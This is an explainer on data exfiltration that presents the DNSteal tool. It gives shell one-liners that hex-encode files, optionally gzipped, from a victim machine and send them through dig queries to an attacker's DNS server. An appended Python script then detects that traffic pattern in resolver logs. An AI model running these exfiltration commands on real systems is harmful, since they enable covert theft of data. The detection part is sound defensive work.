Data exfiltration is sometimes referred to as data extrusion, data exportation, or data theft. All of these terms are used to describe the unauthorized transfer of data from a computer or other device.
Data exfiltration can be conducted manually, by an individual with physical access to a computer, but it can also be an automated process conducted through malicious programming over a network.
Generally, data exfiltration is a form of security breach that occurs when data is downloaded from or uploaded to a computer or server without authorization. These attacks are primarily intended to gain access to the data on a network or machine.
Data exfiltration can be carried out by various methods, such as installing remote-access applications, using removable media devices, social engineering techniques, or phishing emails.
A newer type of data exfiltration tool named "DNSteal" has been released; it is designed to send files to a remote machine via DNS requests.
DNSteal is a data exfiltration tool that stealthily sends files over DNS requests. Once installed and run, it acts as a fake DNS server that lets you quietly extract files from a victim machine through DNS requests.
Here's an example of how to use this tool.
Usage:
On the victim machine, you simply run the following command (each line of hex output from xxd -p becomes the leftmost label of a DNS query):
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files:
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
It also supports gzip compression of the file to allow for faster transfers; this is enabled with the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then, on the victim machine, send a gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
Or, for multiple gzip-compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
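From the defender's side, the loops above leave a recognisable footprint: a burst of queries whose leftmost label is a long run of hex digits (xxd -p emits 60 hex characters per line), all under the same parent domain. The following added detector, which is not part of the original post or of DNSteal, scans resolver log lines for that pattern; the log format ("<timestamp> <client-ip> query: <qname>") and the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# A leftmost label made only of hex digits and at least 32 chars long: real
# hostnames rarely look like this, while `xxd -p` emits 60-char hex lines.
HEX_LABEL = re.compile(r"^[0-9a-f]{32,63}$")
# Hypothetical resolver log format (assumption): "<timestamp> <client-ip> query: <qname>"
LOG_LINE = re.compile(r"^\S+ (\S+) query: (\S+)$")
# Constructed sample log: one client sending three 60-char hex labels under
# filename.com (the shape the dig loops produce), plus benign lookups.
_HEX60 = ("0123456789abcdef" * 4)[:60]
SAMPLE_LOG = "\n".join([
    "2024-01-01T10:00:00 10.0.0.5 query: www.example.org",
    f"2024-01-01T10:00:01 10.0.0.5 query: {_HEX60}.filename.com",
    f"2024-01-01T10:00:01 10.0.0.5 query: {_HEX60[::-1]}.filename.com",
    f"2024-01-01T10:00:02 10.0.0.5 query: {_HEX60[10:] + _HEX60[:10]}.filename.com",
    "2024-01-01T10:00:03 10.0.0.7 query: mail.example.org",
    "2024-01-01T10:00:04 10.0.0.5 query: deadbeef.cdn.example.net",  # short hex label: benign
])

def split_hex_payload(qname):
    """Return (hex_label, parent_domain) if the leftmost label is a hex chunk, else None."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) >= 2 and HEX_LABEL.match(labels[0]):
        return labels[0], ".".join(labels[1:])
    return None

def analyze(log_text, min_queries=3):
    """Group hex-labelled queries by parent domain; report domains with >= min_queries.
    'bytes' is len(hex)/2 summed per domain, i.e. how much payload the chunks could carry."""
    stats = defaultdict(lambda: {"queries": 0, "bytes": 0, "clients": set()})
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, qname = m.groups()
        hit = split_hex_payload(qname)
        if hit is None:
            continue
        label, parent = hit
        stats[parent]["queries"] += 1
        stats[parent]["bytes"] += len(label) // 2
        stats[parent]["clients"].add(client)
    return {d: {"queries": s["queries"], "bytes": s["bytes"], "clients": sorted(s["clients"])}
            for d, s in stats.items() if s["queries"] >= min_queries}

if __name__ == "__main__":
    for domain, s in analyze(SAMPLE_LOG).items():
        print(f"{domain}: {s['queries']} hex-labelled queries, ~{s['bytes']} bytes, clients {s['clients']}")
```

Gzip does not change the picture for the detector, since the compressed stream is still hex-encoded into the same label shape; a volume threshold per parent domain is what separates this from the occasional long hex label used by legitimate CDNs.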